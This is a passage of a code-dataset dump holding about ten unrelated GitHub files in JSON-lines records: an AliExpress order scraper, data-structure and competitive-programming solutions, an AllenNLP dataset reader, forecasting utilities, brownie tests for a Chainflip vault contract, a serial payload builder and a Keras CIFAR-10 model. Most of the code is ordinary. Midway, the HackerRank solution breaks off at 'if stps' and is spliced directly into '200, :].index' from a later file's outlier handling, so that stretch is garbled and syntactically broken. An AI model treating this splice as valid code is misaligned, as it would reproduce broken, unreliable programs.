'http://www.aliexpress.com/',\n )\n\n prefix = ''\n\n ids = ScalableBloomFilter(mode=ScalableBloomFilter.LARGE_SET_GROWTH)\n\n def __init__(self):\n self.filter = ScalableBloomFilter(mode=ScalableBloomFilter.LARGE_SET_GROWTH)\n self.orders = dict()\n self.redis_queue = None\n\n def get_queue(self):\n for value in set(self.server.smembers(self.redis_key)):\n yield value\n\n def start_requests(self):\n OrderSpider.prefix = self.settings['prefix']\n self.redis_key = '{}:order'.format(OrderSpider.prefix)\n\n self.redis_queue = self.get_queue()\n\n db = MongoClient().aliexpress\n for order in db['{}order'.format(OrderSpider.prefix)].find():\n OrderSpider.ids.add(order['_id'])\n\n yield self.next_request()\n\n def next_request(self):\n while True:\n try:\n url = next(self.redis_queue)\n except StopIteration:\n url = None\n\n if not (url and OrderSpider.ids.add(urlparse.parse_qs(urlparse.urlparse(url).query)['productId'][0])):\n break\n\n if url:\n return self.make_requests_from_url(url)\n else:\n raise CloseSpider('redis queue has no url to request')\n\n def make_requests_from_url(self, url):\n self.log('request order page: {}'.format(url), logging.INFO)\n parsed = urlparse.urlparse(url)\n product_id = urlparse.parse_qs(parsed.query)['productId'][0]\n return self.request(product_id, url)\n\n def request(self, product_id, base_url, page=1):\n order_url = '{}&page={}'.format(base_url, page)\n\n self.log('request order page: {}'.format(order_url), logging.INFO)\n return scrapy.Request(url=order_url, meta={'product_id': product_id, 'base_url': base_url, 'page': page},\n callback=self.parse)\n\n def parse(self, response):\n self.log('parse order page: {}'.format(response.url), logging.INFO)\n\n orders = json.loads(response.body.replace('\\\\', ''))\n records = [record for record in orders['records'] if not self.filter.add(record['id'])]\n\n if len(records) > 0:\n for 
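The loads() and dumps() helpers above convert between GeoJSON FeatureCollections and wrapped geometries; a minimal round trip with a single Point feature in the default EPSG:4326:

fc = {
    'type': 'FeatureCollection',
    'features': [{
        'type': 'Feature',
        'geometry': {'type': 'Point', 'coordinates': [0.0, 0.0]},
        'properties': {'id': 1},
    }],
}
wrapped = loads(fc)             # -> [Point] carrying {'id': 1}
assert wrapped[0]['id'] == 1    # feature access via __getitem__
assert dumps(wrapped)['type'] == 'FeatureCollection'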
record in records:\n date = datetime.strptime(record['date'], '%d %b %Y %H:%M')\n quantity = record['quantity']\n buyer_level = record['buyerAccountPointLeval']\n self.order(response.meta['product_id']).append_order(**{'date': date, 'quantity': quantity, 'buyer_level': buyer_level})\n\n return self.request(response.meta['product_id'], response.meta['base_url'], int(response.meta['page']) + 1)\n else:\n self.order(response.meta['product_id']).finish_order = True\n return self.pop_order(response.meta['product_id'])\n\n def order(self, id):\n if id not in self.orders:\n self.orders[id] = Order(id)\n return self.orders[id]\n\n def pop_order(self, id):\n if self.order(id).is_finish():\n order = self.orders.pop(id)\n\n self.log('crawl order: {}'.format(order), logging.INFO)\n\n item = OrderItem()\n item['prefix'] = OrderSpider.prefix\n item['_id'] = order.id\n item['orders'] = order.orders\n return item\n\n\nclass Order(object):\n def __init__(self, id):\n self.id = id\n self.orders = list()\n self.finish_order = False\n\n def append_order(self, **kwargs):\n self.orders.append(kwargs)\n\n def is_finish(self):\n return self.finish_order\n\n def __str__(self):\n return 'product id: {}, orders: {}'.format(self.id, len(self.orders))\n","repo_name":"yangxue088/aliexpress","sub_path":"spiders/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"19"} +{"seq_id":"4897567777","text":"from Node import Node\n\nclass Stack:\n\n def __init__(self):\n self.top = None\n self.size = 0\n\n def push(self, data):\n\n node = Node(data)\n\n if self.top is None:\n self.top = node\n else:\n node.next = self.top\n self.top = node\n\n self.size += 1\n\n def pop(self):\n\n if self.top is None:\n print('Stack is empty')\n else:\n if self.top.next:\n current = self.top\n next_node = current.next\n current.next = None\n current.data = None\n self.top = next_node\n else:\n current = self.top\n current.next = None\n current.data = None\n self.top = None\n\n self.size -= 1\n\n def peek(self):\n\n if self.top is None:\n return 'empty'\n else:\n return self.top.data\n\n def print_list(self):\n\n current = self.top\n\n while current is not None:\n print(current.data)\n current = current.next\n\n\n\nif __name__ == '__main__':\n words = Stack()\n\n words.push('egg')\n words.push('ham')\n words.push('spam')\n\n words.peek()\n words.pop()\n words.peek()\n words.pop()\n words.peek()\n words.pop()\n words.peek()","repo_name":"Aryan-Patel5475/Data-Structure-and-Algorithm","sub_path":"Stack/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34587737998","text":"from typing import Dict\nimport json\nimport logging\n\nfrom overrides import overrides\n\nimport tqdm\n\nfrom allennlp.common import Params\nfrom allennlp.common.checks import ConfigurationError\nfrom allennlp.common.file_utils import cached_path\nfrom allennlp.data.dataset import Dataset\nfrom allennlp.data.dataset_readers.dataset_reader import DatasetReader\nfrom allennlp.data.fields import LabelField, TextField, SequenceLabelField\nfrom allennlp.data.instance import Instance\nfrom allennlp.data.tokenizers import Token, Tokenizer, WordTokenizer\nfrom allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer\n\nlogger = logging.getLogger(__name__) # pylint: 
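Both the spider's class-level ids filter and the per-parse filter above lean on ScalableBloomFilter.add(), which reports whether the key was (probably) already present before inserting it; that is what makes expressions like `not self.filter.add(record['id'])` work as a dedup test:

from pybloom import ScalableBloomFilter

seen = ScalableBloomFilter(mode=ScalableBloomFilter.LARGE_SET_GROWTH)
assert not seen.add('product-1')   # first sighting: not seen before
assert seen.add('product-1')       # second time: filter says already present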
disable=invalid-name\n\n\n@DatasetReader.register(\"full_context_relations\")\nclass FullContextRelationDatasetReader(DatasetReader):\n \"\"\"\n Reads a JSON-lines file containing entity to entity, relative positions, left context, right context, POS tags, NER tags and relation labels.\n\n Expected format for each input line: {\"text\": \"\", \"relpos1\": [], \"relpos2\" : [], \"left_context\" : \"\", 'right_context\" : \"\", \"pos\" : [], \"entity\" :[], \"relation\" : \"\" }\n\n The JSON could have other fields, too, but they are ignored.\n\n Parameters\n ----------\n tokenizer : ``Tokenizer``, optional\n Tokenizer to use to split the title and abstrct into words or other kinds of tokens.\n Defaults to ``WordTokenizer()``.\n token_indexers : ``Dict[str, TokenIndexer]``, optional\n Indexers used to define input token representations. Defaults to ``{\"tokens\":\n SingleIdTokenIndexer()}``.\n \"\"\"\n def __init__(self,\n tokenizer: Tokenizer = None,\n token_indexers: Dict[str, TokenIndexer] = None) -> None:\n self._tokenizer = tokenizer or WordTokenizer()\n self._token_indexers = token_indexers or {\"tokens\": SingleIdTokenIndexer()}\n\n @overrides\n def read(self, file_path):\n instances = []\n with open(cached_path(file_path), \"r\") as data_file:\n logger.info(\"Reading instances from lines in file at: %s\", file_path)\n for line_num, line in enumerate(tqdm.tqdm(data_file.readlines())):\n line = line.strip(\"\\n\")\n if not line:\n continue\n paper_json = json.loads(line)\n e2e = paper_json[\"e2e\"][\"text\"]\n left_context = paper_json[\"left_context\"]\n if left_context:\n left_context = paper_json[\"left_context\"][\"text\"]\n right_context = paper_json[\"right_context\"]\n if right_context:\n right_context = paper_json[\"right_context\"][\"text\"]\n\n pos_tags = paper_json[\"e2e\"][\"pos\"]\n entity_tags = paper_json[\"e2e\"][\"entity\"]\n relpos1 = paper_json[\"e2e\"][\"relpos1\"]\n relpos2 = paper_json[\"e2e\"][\"relpos2\"]\n relation_label = paper_json[\"relation\"]\n\n # e2e tokens.\n e2e_tokens = [ Token(e2e_token) for e2e_token in e2e]\n e2e_sequence = TextField(e2e_tokens, self._token_indexers)\n\n # Left context tokens.\n left_context_tokens = [ Token(token) for token in left_context]\n left_context_sequence = TextField(left_context_tokens, self._token_indexers)\n \n # Right context tokens.\n right_context_tokens = [ Token(token) for token in right_context]\n right_context_sequence = TextField(right_context_tokens, self._token_indexers)\n\n instance_fields = {\"e2e_tokens\" : e2e_sequence, \"left_context_tokens\": left_context_sequence, \"right_context_tokens\" : right_context_sequence}\n\n # Add POS tags.\n instance_fields[\"pos_tags\"] = SequenceLabelField(pos_tags, e2e_sequence, \"pos_tags\")\n\n # Add NER tags.\n instance_fields[\"entity_tags\"] = SequenceLabelField(entity_tags, e2e_sequence, \"entity_tags\")\n\n # Add relpos1.\n instance_fields[\"relpos1_tags\"] = SequenceLabelField(relpos1, e2e_sequence, \"relpos1_tags\")\n\n # Add relpos2.\n instance_fields[\"relpos2_tags\"] = SequenceLabelField(relpos2, e2e_sequence, \"relpos2_tags\")\n\n # Add relation label.\n instance_fields[\"relation_label\"] = LabelField(relation_label)\n\n instances.append(Instance(instance_fields))\n if not instances:\n raise ConfigurationError(\"No instances read!\")\n return Dataset(instances)\n\n @overrides\n # TODO: rewrite this.\n def text_to_instance(self, title: str, abstract: str, venue: str = None) -> Instance: # type: ignore\n # pylint: disable=arguments-differ\n tokenized_title = 
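Each input line the reader's read() consumes must carry the fields it unpacks; a hand-written example line matching that schema (every value here is made up for illustration):

import json

line = json.dumps({
    "e2e": {"text": ["Barack", "Obama"],
            "pos": ["NNP", "NNP"],
            "entity": ["B-PER", "I-PER"],
            "relpos1": [0, 1],
            "relpos2": [1, 0]},
    "left_context": {"text": ["President"]},
    "right_context": {"text": ["spoke", "today"]},
    "relation": "per:title",
})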
self._tokenizer.tokenize(title)\n tokenized_abstract = self._tokenizer.tokenize(abstract)\n title_field = TextField(tokenized_title, self._token_indexers)\n abstract_field = TextField(tokenized_abstract, self._token_indexers)\n fields = {'title': title_field, 'abstract': abstract_field}\n if venue is not None:\n fields['label'] = LabelField(venue)\n return Instance(fields)\n\n @classmethod\n def from_params(cls, params: Params) -> 'FullContextRelationDatasetReader':\n tokenizer = Tokenizer.from_params(params.pop('tokenizer', {}))\n token_indexers = TokenIndexer.dict_from_params(params.pop('token_indexers', {}))\n params.assert_empty(cls.__name__)\n return cls(tokenizer=tokenizer, token_indexers=token_indexers)\n","repo_name":"ramakumar1729/NN4NLP","sub_path":"relation_classifier/dataset_readers/full_context_relations.py","file_name":"full_context_relations.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"22822296535","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the equal function below.\ndef equal(arr):\n\n def best( n ): # greedy algorithm\n r5 = n // 5\n r2 = ( n - ( r5 * 5 ) ) // 2\n r1 = n - ( ( r5 * 5 ) + ( r2 * 2 ) )\n return [ r5, r2, r1 ]\n\n if len( arr )<2:\n return 0\n\n arr.sort()\n\n ops = 1000 * len(arr)\n for y in range( 0, 5 ): # 0-4 decrement first element \n stps = 0 if y==0 else 1\n for x in range( 1, len( arr ) ): # can we go into negatives with bigger y's?\n# count( x, 0 if y==0 or bst[0][0] )\n ds = best( arr[x]-(arr[0]-y) )\n stps = stps + ( ds[0] + ds[1] + ds[2] )\n# if ( ds[0] + ds[1] + ds[0] )<=6: print( \"stps:{} ds:{} ops:{} y:{}\".format( stps, ds, ops, y) )\n if stps 200, :].index\r\n\r\n for x in outlier_index:\r\n data.loc[x, 'speed'] = data.loc[x - 1, 'speed']\r\n\r\n data.drop(cols_to_drop, axis=1, inplace=True)\r\n data = data.set_index('timeStamp')\r\n\r\n if resample:\r\n data = data.resample(\"1S\").first().ffill()\r\n\r\n data['date'] = data.index.copy()\r\n\r\n data.drop(['date'], axis=1, inplace=True)\r\n\r\n print(data)\r\n\r\n return data\r\n\r\n\r\ndef make_dirs(path):\r\n \"\"\"Make Directory If not Exists\"\"\"\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n\r\n\r\ndef plot_full(path, data, id, feature):\r\n \"\"\"Plot Full Graph of Drive Cycle of Specific Device ID\"\"\"\r\n data.plot(y=feature, figsize=(16, 8))\r\n plt.xlabel('DateTime', fontsize=10)\r\n plt.xticks(rotation=45)\r\n plt.ylabel('Speed', fontsize=10)\r\n plt.grid()\r\n plt.title('Drive Cycle of Device ID {}'.format(id))\r\n plt.savefig(os.path.join(path, 'Drive_Cycle_Device_ID_{}.png'.format(id)))\r\n\r\n\r\ndef plot_split(path, data, id, valid_start, test_start, feature):\r\n \"\"\"Plot Splitted Graph of Drive Cycle of Specific Device ID\"\"\"\r\n data[data.index < valid_start][[feature]].rename(columns={feature: 'train'}) \\\r\n .join(data[(data.index >= valid_start) & (data.index < test_start)][[feature]] \\\r\n .rename(columns={feature: 'validation'}), how='outer') \\\r\n .join(data[data.index >= test_start][[feature]].rename(columns={feature: 'test'}), how='outer') \\\r\n .plot(y=['train', 'validation', 'test'], figsize=(16, 8), fontsize=15)\r\n\r\n plt.xlabel('DateTime', fontsize=10)\r\n plt.xticks(rotation=45)\r\n plt.ylabel('Speed', fontsize=10)\r\n plt.grid()\r\n plt.title('Drive Cycle of Device ID {} Splitted'.format(id))\r\n plt.savefig(os.path.join(path, 
'Drive_Cycle_Device_ID_{}_Splitted.png'.format(id)))\r\n\r\n\r\ndef split_sequence_uni_step(sequence, n_steps):\r\n \"\"\"Rolling Window Function for Uni-step\"\"\"\r\n\r\n sequence = sequence.values\r\n\r\n X, y = list(), list()\r\n\r\n for i in range(len(sequence)):\r\n end_ix = i + n_steps\r\n\r\n if end_ix > len(sequence)-1:\r\n break\r\n\r\n seq_x, seq_y = sequence[i:end_ix], sequence[end_ix]\r\n\r\n X.append(seq_x)\r\n y.append(seq_y)\r\n\r\n return np.array(X), np.array(y)\r\n\r\n\r\ndef split_sequence_multi_step(sequence, n_steps_in, n_steps_out):\r\n \"\"\"Rolling Window Function for Multi-step\"\"\"\r\n\r\n sequence = sequence.values\r\n\r\n X, y = list(), list()\r\n\r\n for i in range(len(sequence)):\r\n end_ix = i + n_steps_in\r\n out_end_ix = end_ix + n_steps_out\r\n\r\n if out_end_ix > len(sequence):\r\n break\r\n\r\n seq_x, seq_y = sequence[i:end_ix], sequence[end_ix:out_end_ix]\r\n\r\n X.append(seq_x)\r\n y.append(seq_y)\r\n\r\n return np.array(X), np.array(y)[:, :, 0]\r\n\r\n\r\ndef get_data_loader(X, y, train_split, test_split, batch_size):\r\n \"\"\"Get Data Loader\"\"\"\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=train_split, shuffle=False)\r\n X_valid, X_test, y_valid, y_test = train_test_split(X_test, y_test, train_size=test_split, shuffle=False)\r\n\r\n # Wrap for Data Loader #\r\n train_set = TensorDataset(torch.from_numpy(X_train), torch.from_numpy(y_train))\r\n val_set = TensorDataset(torch.from_numpy(X_valid), torch.from_numpy(y_valid))\r\n test_set = TensorDataset(torch.from_numpy(X_test), torch.from_numpy(y_test))\r\n\r\n # Prepare Data Loader #\r\n train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=False)\r\n val_loader = DataLoader(val_set, batch_size=batch_size, shuffle=False)\r\n test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=False, drop_last=True)\r\n\r\n return train_loader, val_loader, test_loader\r\n\r\n\r\ndef test_plot(pred, actual, path, feature, id, network, transfer_learning=False):\r\n \"\"\"Plot Test set of Drive Cycle of Specific Device ID\"\"\"\r\n\r\n plt.figure(figsize=(10, 8))\r\n plt.plot(pred, label='Pred')\r\n plt.plot(actual, label='Actual')\r\n\r\n plt.xlabel('DateTime', fontsize=12)\r\n plt.xticks()\r\n plt.ylabel(feature, fontsize=12)\r\n plt.grid()\r\n plt.legend(fontsize=16)\r\n\r\n if transfer_learning:\r\n plt.title('Drive Cycle of Device ID {} Prediction using Pre-trained {}'.format(id, network.__class__.__name__), fontsize=18)\r\n plt.savefig(os.path.join(path, 'Drive_Cycle_Device_ID_{}_Test_{}_Transfer_Detailed.png'.format(id, network.__class__.__name__)))\r\n plt.show()\r\n else:\r\n plt.title('Drive Cycle of Device ID {} Prediction using {}'.format(id, network.__class__.__name__), fontsize=18)\r\n plt.savefig(os.path.join(path, 'Drive_Cycle_Device_ID_{}_Test_{}.png'.format(id, network.__class__.__name__)))\r\n plt.show()\r\n\r\n\r\ndef percentage_error(actual, predicted):\r\n \"\"\"Percentage Error\"\"\"\r\n res = np.empty(actual.shape)\r\n for j in range(actual.shape[0]):\r\n if actual[j] != 0:\r\n res[j] = (actual[j] - predicted[j]) / actual[j]\r\n else:\r\n res[j] = predicted[j] / np.mean(actual)\r\n return res\r\n\r\n\r\ndef mean_percentage_error(y_true, y_pred):\r\n \"\"\"Mean Percentage Error\"\"\"\r\n mpe = np.mean(percentage_error(np.asarray(y_true), np.asarray(y_pred))) * 100\r\n return mpe\r\n\r\n\r\ndef mean_absolute_percentage_error(y_true, y_pred):\r\n \"\"\"Mean Absolute Percentage Error\"\"\"\r\n mape = 
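Both rolling-window helpers above begin with `sequence = sequence.values`, so they expect a pandas object rather than a plain list. A tiny uni-step demo:

import pandas as pd

X, y = split_sequence_uni_step(pd.Series([1, 2, 3, 4, 5]), n_steps=2)
# X -> [[1, 2], [2, 3], [3, 4]]   windows of length n_steps
# y -> [3, 4, 5]                  the value immediately after each window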
np.mean(np.abs(percentage_error(np.asarray(y_true), np.asarray(y_pred)))) * 100\r\n return mape\r\n\r\n\r\ndef get_lr_scheduler(optimizer, args):\r\n \"\"\"Learning Rate Scheduler\"\"\"\r\n if args.lr_scheduler == 'step':\r\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=args.lr_decay_every, gamma=args.lr_decay_rate)\r\n elif args.lr_scheduler == 'plateau':\r\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.2, threshold=0.01, patience=5)\r\n elif args.lr_scheduler == 'cosine':\r\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.num_epochs, eta_min=0)\r\n else:\r\n raise NotImplementedError\r\n\r\n return scheduler","repo_name":"KBS9622/IntelliCharga","sub_path":"Main Body/TimeSeriesPredictionUsingDL/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25242640250","text":"from consts import *\nfrom shared_tests import *\nfrom brownie import reverts\nfrom brownie.test import given, strategy\nimport random\n\n\n@given(\n st_srcChain=strategy(\"uint32\"),\n st_srcAddress=strategy(\"bytes\"),\n st_message=strategy(\"bytes\"),\n st_sender=strategy(\"address\"),\n)\ndef test_executexCall(\n cf,\n cfTester,\n st_sender,\n st_srcChain,\n st_srcAddress,\n st_message,\n):\n cf.SAFEKEEPER.transfer(cf.vault, TEST_AMNT)\n\n startBalVault = cf.vault.balance()\n startBalRecipient = cfTester.balance()\n\n message = hexStr(st_message)\n args = [\n cfTester.address,\n st_srcChain,\n st_srcAddress,\n message,\n ]\n tx = signed_call_cf(cf, cf.vault.executexCall, *args, sender=st_sender)\n\n assert cf.vault.balance() == startBalVault\n assert cfTester.balance() == startBalRecipient\n\n assert tx.events[\"ReceivedxCall\"][0].values() == [\n st_srcChain,\n hexStr(st_srcAddress),\n message,\n 0,\n ]\n\n\n# token contract doesn't have the cfReceivexCall function implemented\ndef test_executexCall_rev_noCfReceive(cf, token):\n cf.SAFEKEEPER.transfer(cf.vault, TEST_AMNT)\n randToken = random.choice([NATIVE_ADDR, token])\n\n args = [\n randToken,\n JUNK_INT,\n JUNK_HEX,\n JUNK_HEX,\n ]\n with reverts():\n signed_call_cf(cf, cf.vault.executexCall, *args)\n\n\ndef test_executexCall_rev_nzAddrs(cf):\n args = [\n ZERO_ADDR,\n JUNK_INT,\n JUNK_HEX,\n JUNK_HEX,\n ]\n with reverts(REV_MSG_NZ_ADDR):\n signed_call_cf(cf, cf.vault.executexCall, *args)\n\n\ndef test_executexCallEth_rev_msgHash(cf):\n args = [\n NON_ZERO_ADDR,\n JUNK_INT,\n JUNK_HEX,\n JUNK_HEX,\n ]\n\n sigData = AGG_SIGNER_1.getSigDataWithNonces(\n cf.keyManager, cf.vault.executexCall, nonces, *args\n )\n\n sigData_modif = sigData[:]\n sigData_modif[0] += 1\n with reverts(REV_MSG_SIG):\n cf.vault.executexCall(sigData_modif, *args, {\"from\": cf.ALICE})\n\n sigData_modif = sigData[:]\n sigData_modif[1] += 1\n with reverts(REV_MSG_SIG):\n cf.vault.executexCall(sigData_modif, *args, {\"from\": cf.ALICE})\n\n sigData_modif = sigData[:]\n sigData_modif[2] = NON_ZERO_ADDR\n with reverts(REV_MSG_SIG):\n cf.vault.executexCall(sigData_modif, *args, {\"from\": cf.ALICE})\n\n\n# rev if cfReceiver reverts the call\ndef test_executexCallEth_rev_CFReceiver(cf, cfReceiverFailMock):\n cf.SAFEKEEPER.transfer(cf.vault, TEST_AMNT)\n\n args = [\n cfReceiverFailMock.address,\n JUNK_INT,\n JUNK_HEX,\n JUNK_HEX,\n ]\n with reverts(REV_MSG_CFREC_REVERTED):\n signed_call_cf(cf, cf.vault.executexCall, *args)\n\n\n# If user contract catches the external reversion, 
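get_lr_scheduler above reads only a handful of attributes off args, so a bare namespace is enough to drive it; minimal wiring for the 'step' policy (the attribute names are taken from the function body):

import argparse
import torch

model = torch.nn.Linear(4, 1)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
args = argparse.Namespace(lr_scheduler='step', lr_decay_every=10,
                          lr_decay_rate=0.5, num_epochs=100)
scheduler = get_lr_scheduler(optimizer, args)  # StepLR(step_size=10, gamma=0.5)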
balances are not affected\ndef test_executexCallEth_tryCatch(cf, cfReceiverTryMock):\n cf.SAFEKEEPER.transfer(cf.vault)\n\n startBalVault = cf.vault.balance()\n startBalRecipient = cfReceiverTryMock.balance()\n\n args = [\n cfReceiverTryMock.address,\n JUNK_INT,\n JUNK_HEX,\n JUNK_HEX,\n ]\n\n tx = signed_call_cf(cf, cf.vault.executexCall, *args)\n assert tx.events[\"FailedExternalCall\"][\"revertString\"] == REV_MSG_CFREC_REVERTED\n\n # Check that ETH amount is transferred to the dstAddress\n assert cf.vault.balance() == startBalVault\n assert cfReceiverTryMock.balance() == startBalRecipient\n","repo_name":"chainflip-io/chainflip-eth-contracts","sub_path":"tests/unit/vault/test_executexCall.py","file_name":"test_executexCall.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"4761370299","text":"# https://www.acmicpc.net/problem/1744\n\nimport sys\nimport heapq\n\n\ninput = sys.stdin.readline\n\nN = int(input())\n\npositiveHeap = []\nnegetiveHeap = []\npositiveSum = 0\nnegetiveSum = 0\n\nfor i in range(N):\n num = int(input())\n if(num<=0):\n heapq.heappush(negetiveHeap,num)\n else:\n heapq.heappush(positiveHeap,(-num,num))\n\nif(len(positiveHeap) ==1):\n positiveSum = positiveHeap[0][1]\nelse:\n while(len(positiveHeap)>1):\n A = heapq.heappop(positiveHeap)[1]\n B = heapq.heappop(positiveHeap)[1]\n if(A*B >= A+B):\n positiveSum += A*B\n else:\n positiveSum += A+B\n \n\n if(len(positiveHeap)==1):\n positiveSum += positiveHeap[0][1]\n\nif(len(negetiveHeap) ==1):\n negetiveSum = negetiveHeap[0]\nelse:\n while(len(negetiveHeap)>1):\n A = heapq.heappop(negetiveHeap)\n B = heapq.heappop(negetiveHeap)\n negetiveSum += A*B\n\n if(len(negetiveHeap) ==1):\n negetiveSum += negetiveHeap[0]\n\nprint(negetiveSum+positiveSum)","repo_name":"hongju-jeong/python-algorithm","sub_path":"Greedy/P1744_수_묶기.py","file_name":"P1744_수_묶기.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43671461813","text":"'''\nContains functions to create a serial payload for sending to the PSOC5.\n'''\nfrom enum import Enum\nfrom microserial.constants import EOC\n\n\ndef create_payload(cmd, fn, dformat, data=None):\n '''\n Create payload to be written to the serial port.\n Order must be the same as in console.c, processCommand()\n\n payload - (optional) must be a string\n '''\n b = bytearray()\n b.append(cmd.value)\n b.append(fn.value)\n b.append(dformat.value)\n if data is not None:\n d = data.encode() #convert str to utf8 bytearray\n b.extend(d)\n b.append(ord(EOC))\n return b\n\ndef create_empty_payload():\n b = bytearray()\n b.append(ord(EOC))","repo_name":"designingSparks/microserial","sub_path":"microserial/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34611759700","text":"from user import User\n\n\njohnny5 = User(\"johnny\", \"five\", \"johnny@five.com\", 69)\njohnny5.enroll().spend_points(50).display_info()\n\nuser1 = User(\"user\", \"one\", \"user@one.com\", 42)\nuser1.enroll().spend_points(80).display_info()\nuser1.enroll()\n\nuser2 = User(\"other\", \"user\", \"other@user.com\", 1337)\nuser2.display_info()\nuser2.spend_points(40)\n\njohnny5.display_balance(0)\njohnny5.add_account(5000000, 0.5).transfer_funds(5000, user2, 
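create_payload above only needs command/function/format objects whose .value is a byte-sized int, plus an optional string payload. A hedged usage sketch; these Enum members are invented for illustration, and only EOC is real (imported from microserial.constants):

from enum import Enum

class Cmd(Enum):
    READ = 0x01       # hypothetical command id

class Fn(Enum):
    VOLTAGE = 0x10    # hypothetical function id

class Fmt(Enum):
    ASCII = 0x00      # hypothetical data format

payload = create_payload(Cmd.READ, Fn.VOLTAGE, Fmt.ASCII, data="ch1")
# -> bytearray([0x01, 0x10, 0x00]) + b"ch1" + bytes([ord(EOC)])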
from_account=1)\r\n\r\nuser2.display_balance(0)\r\n","repo_name":"cptchuckles/codingdojo","sub_path":"python/oop/run_user.py","file_name":"run_user.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"36256097431","text":"import numpy as np\r\nfrom keras.utils import to_categorical\r\nfrom tensorflow.keras.datasets import cifar10\r\nfrom tensorflow.keras.layers import Input, Flatten, Dense, Activation, Conv2D, BatchNormalization, Dropout, MaxPooling2D\r\nfrom tensorflow.keras.models import Model, Sequential\r\nfrom tensorflow.keras.optimizers import Adam\r\nimport matplotlib.pyplot as plt\r\nfrom keras import backend as K\r\nfrom tensorflow.keras.layers import LeakyReLU\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nimport os\r\n\r\ndef plot_loss(history):\r\n    plt.plot(history.history['loss'])\r\n    plt.plot(history.history['val_loss'])\r\n    plt.title('Model loss')\r\n    plt.ylabel('Loss')\r\n    plt.xlabel('Epochs')\r\n    plt.legend(['Train', 'val'], loc = 0)\r\n\r\ndef plot_acc(history):\r\n    plt.plot(history.history['accuracy'])\r\n    plt.plot(history.history['val_accuracy'])\r\n    plt.title('Model accuracy')\r\n    plt.ylabel('accuracy')\r\n    plt.xlabel('Epochs')\r\n    plt.legend(['Train', 'val'], loc=0)\r\n\r\nsave_dir = os.path.join(os.getcwd(), 'saved_model')\r\nmodel_name = 'keras_cifar10_aug_trained_model_upgrade.h5' # .h5/.hdf5 -> Keras's format for saving and distributing large model files\r\n\r\nimg_rows, img_cols = 32, 32\r\n\r\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\r\n\r\n# CLASSES = np.array(['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'])\r\n# actual_single = CLASSES[y_train]\r\n# plt.imshow(x_train[20], interpolation=\"bicubic\")\r\n# tmp = \"Label:\" + str(actual_single[20])\r\n# plt.title(tmp, fontsize=30)\r\n# plt.tight_layout()\r\n# plt.show()\r\n# With the TensorFlow backend the input order is (Height, Width, channel); with the Theano backend it is (channel, Height, Width)\r\nif K.image_data_format() == 'channels_first':\r\n    x_train = x_train.reshape(x_train.shape[0], 3, img_rows, img_cols)\r\n    x_test = x_test.reshape(x_test.shape[0], 3, img_rows, img_cols)\r\n    input_shape = (3, img_rows, img_cols)\r\nelse:\r\n    x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 3)\r\n    x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 3)\r\n    input_shape = (img_rows, img_cols, 3)\r\n\r\nNUM_CLASSES = 10\r\n\r\nx_train = x_train.astype('float32')/255.0\r\nx_test = x_test.astype('float32')/255.0\r\ny_train = to_categorical(y_train, NUM_CLASSES)\r\ny_test = to_categorical(y_test, NUM_CLASSES)\r\n\r\n# Build the model\r\n\r\ninput_layer = Input(shape=(32, 32, 3))\r\n\r\nx = Conv2D(32, kernel_size=(3, 3), kernel_initializer='he_normal', strides=1, padding='same', name='Conv1')(input_layer)\r\nx = LeakyReLU()(x)\r\nx = Conv2D(32, kernel_size=(3, 3), kernel_initializer='he_normal', strides=2, padding='same', name='Conv2')(x)\r\nx = LeakyReLU()(x)\r\nx = Dropout(0.5)(x)\r\nx = Conv2D(64, kernel_size=(3, 3), kernel_initializer='he_normal', strides=1, padding='same', name='Conv3')(x)\r\nx = LeakyReLU()(x)\r\nx = Dropout(0.5)(x)\r\nx = Conv2D(64, kernel_size=(3, 3), kernel_initializer='he_normal', strides=2, padding='same', name='Conv4')(x)\r\nx = LeakyReLU()(x)\r\nx = Flatten()(x)\r\nx = Dense(128, kernel_initializer='he_normal')(x)\r\nx = LeakyReLU()(x)\r\nx = Dense(NUM_CLASSES)(x)\r\noutput_layer = Activation('softmax')(x)\r\n\r\nmodel = Model(input_layer, output_layer)\r\nmodel.summary()\r\n
